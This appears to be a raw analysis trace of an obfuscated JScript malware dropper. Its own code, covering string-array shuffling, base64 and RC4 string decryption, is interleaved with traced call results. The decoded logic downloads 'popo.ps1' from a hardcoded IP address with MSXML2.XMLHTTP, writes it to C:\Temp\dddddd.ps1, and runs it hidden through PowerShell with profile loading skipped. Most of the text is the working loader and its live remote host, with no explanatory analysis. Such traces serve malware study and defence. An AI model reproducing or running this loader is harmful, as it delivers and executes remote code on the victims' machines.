  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
  • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
var _0x3d8f07 = _0x3d8f ( );
  • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
  • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
  • _0x3d8f() ➔ 371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP
  • _0x3d8f() ➔ rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU
  • _0x3d8f() ➔ q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU
  • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
  • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
  • _0x3d8f() ➔ W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG
  • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
  • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
return _0x5598 =
function (_0xe32f90, _0x265890) {
  • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
  • _0x5598(304,"[aOH") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
  • _0x5598(304,"[aOH") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
  • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
_0xe32f90 = _0xe32f90 - 0x111;
var _0xd04222 = _0x3d8f07[_0xe32f90];
if ( _0x5598['oGawjd'] === undefined )
{
var _0x1d860e = function (_0x51df1d) {
  • _0x1d860e("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
  • _0x1d860e("Run") ➔ undefined
  • _0x1d860e("message") ➔ undefined
  • _0x1d860e("12642224tnuDGo") ➔ undefined
  • _0x1d860e("Quit") ➔ undefined
  • _0x1d860e("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ "Failed to execute PowerShell script: "
  • _0x1d860e("C:\Temp\dddddd.ps1") ➔ undefined
  • _0x1d860e("124678FeSFCc") ➔ undefined
  • _0x1d860e("WQ7dVXVcVCkpCLJcM8keW6W") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
  • _0x1d860e("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
var _0x31b964 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
var _0x154394 = '', _0x203110 = '';
for ( var _0x1d9a6f = 0x0, _0x3ffedd, _0x2aa5db, _0x2f4f63 = 0x0 ; _0x2aa5db = _0x51df1d['charAt'] ( _0x2f4f63 ++ ) ; ~ _0x2aa5db && ( _0x3ffedd = _0x1d9a6f % 0x4 ? _0x3ffedd * 0x40 + _0x2aa5db : _0x2aa5db, _0x1d9a6f ++ % 0x4 ) ? _0x154394 += String['fromCharCode'] ( 0xff & _0x3ffedd >> ( - 0x2 * _0x1d9a6f & 0x6 ) ) : 0x0 )
{
_0x2aa5db = _0x31b964['indexOf'] ( _0x2aa5db );
}
for ( var _0x241040 = 0x0, _0x376734 = _0x154394['length'] ; _0x241040 < _0x376734 ; _0x241040 ++ )
{
_0x203110 += '%' + ( '00' + _0x154394['charCodeAt'] ( _0x241040 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
}
return decodeURIComponent ( _0x203110 );
  • decodeURIComponent("%c3%82%23%c3%8d%c3%82%00%3c%c3%92%3b%c3%8d%08%c2%8b%c2%ad%0e") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
  • decodeURIComponent("%ad%43") ➔ undefined
  • decodeURIComponent("%30%44%92%00%61") ➔ undefined
  • decodeURIComponent("%d7%6e%b8%db%6d%b8%4c%d5%1d%80") ➔ undefined
  • decodeURIComponent("%a9%42%13") ➔ undefined
  • decodeURIComponent("%46%61%69%6c%65%64%20%74%6f%20%65%78%65%63%75%74%65%20%50%6f%77%65%72%53%68%65%6c%6c%20%73%63%72%69%70%74%3a%20") ➔ "Failed to execute PowerShell script: "
  • decodeURIComponent("%72%d1%0c%3c%30%c3%0c%30%cf%4b") ➔ undefined
  • decodeURIComponent("%d7%6e%3a%ef%c7%c4%b1%f7%02") ➔ undefined
  • decodeURIComponent("%c2%ae%c3%bf%1b%c2%bd%c2%8f%72%58%c2%9b%c2%84%c3%ac") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
  • decodeURIComponent("%31%32%36%34%32%32%32%34%74%6e%75%44%47%6f") ➔ "12642224tnuDGo"
};
                                                                                                                                                                                                                                          108
                                                                                                                                                                                                                                          var _0x5598af = function (_0x203204, _0xf70333) {
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("W4iJW43dGGa8W5i7W40iWOVcRq4","E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("Run","[aOH") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("message","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("12642224tnuDGo","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("Quit","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia","E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("C:\Temp\dddddd.ps1","[aOH") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("124678FeSFCc","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("WQ7dVXVcVCkpCLJcM8keW6W","E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("mti2ndiYmJr0BNver28","[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                                                          109
                                                                                                                                                                                                                                          var _0x23e053 = [], _0x26adf9 = 0x0, _0xa9f75e, _0x3564e4 = '';
                                                                                                                                                                                                                                            110
                                                                                                                                                                                                                                            _0x203204 = _0x1d860e ( _0x203204 );
                                                                                                                                                                                                                                            • _0x1d860e("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
                                                                                                                                                                                                                                            • _0x1d860e("Run") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("message") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("12642224tnuDGo") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("Quit") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ "Failed to execute PowerShell script: "
                                                                                                                                                                                                                                            • _0x1d860e("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("124678FeSFCc") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("WQ7dVXVcVCkpCLJcM8keW6W") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
                                                                                                                                                                                                                                            • _0x1d860e("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                                                                                            111
                                                                                                                                                                                                                                            var _0x317ee2;
                                                                                                                                                                                                                                              112
                                                                                                                                                                                                                                              for ( _0x317ee2 = 0x0 ; _0x317ee2 < 0x100 ; _0x317ee2 ++ )
                                                                                                                                                                                                                                                113
                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                  114
                                                                                                                                                                                                                                                  _0x23e053[_0x317ee2] = _0x317ee2;
                                                                                                                                                                                                                                                    115
                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                      116
                                                                                                                                                                                                                                                      for ( _0x317ee2 = 0x0 ; _0x317ee2 < 0x100 ; _0x317ee2 ++ )
                                                                                                                                                                                                                                                        117
                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                          118
                                                                                                                                                                                                                                                          _0x26adf9 = ( _0x26adf9 + _0x23e053[_0x317ee2] + _0xf70333['charCodeAt'] ( _0x317ee2 % _0xf70333['length'] ) ) % 0x100, _0xa9f75e = _0x23e053[_0x317ee2], _0x23e053[_0x317ee2] = _0x23e053[_0x26adf9], _0x23e053[_0x26adf9] = _0xa9f75e;
                                                                                                                                                                                                                                                            119
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              120
                                                                                                                                                                                                                                                              _0x317ee2 = 0x0, _0x26adf9 = 0x0;
                                                                                                                                                                                                                                                                121
                                                                                                                                                                                                                                                                for ( var _0xee0fb4 = 0x0 ; _0xee0fb4 < _0x203204['length'] ; _0xee0fb4 ++ )
                                                                                                                                                                                                                                                                  122
                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                    123
                                                                                                                                                                                                                                                                    _0x317ee2 = ( _0x317ee2 + 0x1 ) % 0x100, _0x26adf9 = ( _0x26adf9 + _0x23e053[_0x317ee2] ) % 0x100, _0xa9f75e = _0x23e053[_0x317ee2], _0x23e053[_0x317ee2] = _0x23e053[_0x26adf9], _0x23e053[_0x26adf9] = _0xa9f75e, _0x3564e4 += String['fromCharCode'] ( _0x203204['charCodeAt'] ( _0xee0fb4 ) ^ _0x23e053[( _0x23e053[_0x317ee2] + _0x23e053[_0x26adf9] ) % 0x100] );
                                                                                                                                                                                                                                                                      124
                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                        125
                                                                                                                                                                                                                                                                        return _0x3564e4;
                                                                                                                                                                                                                                                                          126
                                                                                                                                                                                                                                                                          };
                                                                                                                                                                                                                                                                            127
                                                                                                                                                                                                                                                                            _0x5598['cSinUy'] = _0x5598af, _0x52b743 = arguments, _0x5598['oGawjd'] = ! ! [];
                                                                                                                                                                                                                                                                              128
                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                129
                                                                                                                                                                                                                                                                                var _0x3cf29b = _0x3d8f07[0x0], _0x360a4b = _0xe32f90 + _0x3cf29b, _0x301f1f = _0x52b743[_0x360a4b];
                                                                                                                                                                                                                                                                                  130
                                                                                                                                                                                                                                                                                  return ! _0x301f1f ? ( _0x5598['yAOuWA'] === undefined && ( _0x5598['yAOuWA'] = ! ! [] ), _0xd04222 = _0x5598['cSinUy'] ( _0xd04222, _0x265890 ), _0x52b743[_0x360a4b] = _0xd04222 ) : _0xd04222 = _0x301f1f, _0xd04222;
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("W4iJW43dGGa8W5i7W40iWOVcRq4","E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("Run","[aOH") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("message","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("12642224tnuDGo","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("Quit","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia","E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("C:\Temp\dddddd.ps1","[aOH") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("124678FeSFCc","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("WQ7dVXVcVCkpCLJcM8keW6W","E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("mti2ndiYmJr0BNver28","[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                                                                                                  131
                                                                                                                                                                                                                                                                                  }, _0x5598 ( _0x52b743, _0xdbcf57 );
                                                                                                                                                                                                                                                                                    132
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      133
                                                                                                                                                                                                                                                                                      function RunPowerShellScript(_0x3215af) {
                                                                                                                                                                                                                                                                                      • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                                                                                      134
                                                                                                                                                                                                                                                                                      var _0x42f115 = _0x165511, _0xe1c1e0 = _0x429836;
                                                                                                                                                                                                                                                                                        135
                                                                                                                                                                                                                                                                                        try
                                                                                                                                                                                                                                                                                          136
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            137
                                                                                                                                                                                                                                                                                            var _0x1a1ae9 = POWERSHELL_CMD + '\x22' + _0x3215af + '\x22';
                                                                                                                                                                                                                                                                                              138
                                                                                                                                                                                                                                                                                              shell[_0xe1c1e0 ( 0x11d ) ] ( _0x1a1ae9, 0x0, ! ! [] );
• _0xe1c1e0(285) ➔ "Run"
• Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
    }
    catch ( _0x10f49e )
    {
        LogError ( _0x42f115 ( 0x12d ) + _0x10f49e[_0xe1c1e0 ( 0x12a ) ] );
    }
}
DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( _0x165511 ( 0x126 ) ), WScript[_0x429836 ( 0x12c ) ] ( ) );
• DownloadScript("http://196.251.92.64/crypt/popo.ps1","C:\Temp\dddddd.ps1") ➔ true
• RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined